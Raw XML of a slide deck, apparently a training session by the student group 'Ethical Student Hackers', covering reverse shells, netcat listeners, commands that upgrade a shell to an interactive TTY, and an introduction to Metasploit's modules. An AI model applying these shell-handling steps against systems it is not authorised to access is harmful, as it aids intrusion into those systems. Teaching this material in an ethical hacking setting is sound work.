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Roboto Mon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bold.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-regular.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-boldItalic.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMon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8c8c92569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8c8c92569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4ca01e88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4ca01e88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4ca01e88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4ca01e88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4ca01e88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4ca01e88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4ca01e88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4ca01e88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70aba2c6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70aba2c6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70aba2c6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70aba2c6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70aba2c6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70aba2c6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70aba2c6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70aba2c6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11e2faf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11e2faf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9bece4b73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9bece4b73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8df67c48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8df67c48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bece4b7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9bece4b7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8df67c48a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df67c48a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c8c92569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c8c92569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4ca01e88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4ca01e88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4ca01e88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4ca01e88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4ca01e88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4ca01e88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4ca01e88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4ca01e88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4ca01e88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4ca01e88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28341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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2834125"/>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Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;16;p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Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;17;p3"/>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4"/>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5"/>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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298450" y="11510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6"/>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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="35766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txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490250" y="450150"/>
            <a:ext cx="6367800" cy="30960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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-26525" y="3576475"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="0"/>
            <a:ext cx="4572000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3335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3354B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Google Shape;40;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4572000" cy="28341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txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265500" y="238625"/>
            <a:ext cx="4115700" cy="2476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8"/>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 name="Google Shape;44;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2834125"/>
            <a:ext cx="4572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rot="5400000">
            <a:off x="2000700" y="2559600"/>
            <a:ext cx="5143500" cy="243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0"/>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33354B"/>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63250" y="95600"/>
            <a:ext cx="7417500" cy="576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09CECE"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buNone/>
              <a:defRPr b="1" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mon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indent="-317500" lvl="1" marL="9144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2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="13716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3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="18288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4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="22860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5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="27432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6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="32004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7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="36576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8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Google Shape;8;p1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7968174" y="4326475"/>
            <a:ext cx="1175825" cy="8170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github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.m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ssh.com/ssh/tunneling/example" TargetMode="Externa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600"/>
              <a:t>Ethical Student Hackers</a:t>
            </a:r>
            <a:endParaRPr sz="4600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Google Shape;57;p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 All the shells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Reverse shells are when we get a remote user to allow us to send commands to their OS. This is done by sending commands through a TCP or UDP socket directly into a command window on the remote host. To be able to get this form of shell, we first need some way of executing code on the remote host. Later I will show an example of this.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The listener: nc -nlvp 8001</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>-n - numeric-only IP addresses, no DNS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>-l  - Listen mode, for inbound connects</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>-v - verbose [use twice to be more verbose]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>-p - local port number</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p21"/>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Reverse shells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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="33354B"/>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Depending on the type of shell you </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>chose, you may get back a shell that</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>isn’t very interactive. There may not be any auto-complete or some of the nice to have features that BASH offers such as history.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Let’s try and upgrade what the shell looks like with this command:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>python3 -c 'import pty; pty.spawn("/bin/bash")'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> - This spawns us a bash shell within the existing shell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>We can make it slightly more interactive with a tool called rlwrap</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>sudo apt install rlwrap</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>rlwrap nc -nvlp 9000</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p22"/>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shell isn’t interactive!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="122" name="Google Shape;122;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="1224" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3805175" y="852900"/>
            <a:ext cx="5231050" cy="762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We can get a fully interactive TTY shell with the following commands</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>python3 -c 'import pty; pty.spawn("/bin/bash")'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ctrl + z</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>echo screen-256color &amp;&amp; tput lines &amp;&amp; tput cols</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>stty raw -echo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>fg</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>export SHELL=bash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>export TERM=xterm-256color</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>stty rows [rows] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>columns]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Now we have a fully interactive shell!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Google Shape;128;p2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 full TTY shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="129" name="Google Shape;129;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5180646" y="2146496"/>
            <a:ext cx="3719950" cy="1856750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7573500" y="3192750"/>
            <a:ext cx="1559400" cy="5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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I typed ‘fg’ here</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Google Shape;131;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7202400" y="3084750"/>
            <a:ext cx="114600" cy="627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So we have played around with spawning reverse shells, we can move on to something more fun</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Let’s look into metasploit!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Metasploit is a framework for exploiting and gaining access to all sorts of devices, ranging from Linux, Windows, Android, IOS, Mac… It has a wide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>variety</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> of exploits and tools </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>available</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> that are very useful and easy to use.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p2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Now, something more fun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Metasploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;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A penetration testing framework that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>incorporates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> many very useful tools and functions within it</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Different modules:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Recon 		- Enumeration and exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>compatibility</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Encoders		- Obfuscate payloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Exploit		- </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Post Exploitation	- Information gathering and exfiltration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Auxiliary		- Exploit </a:t>
            </a:r>
            <a:r>
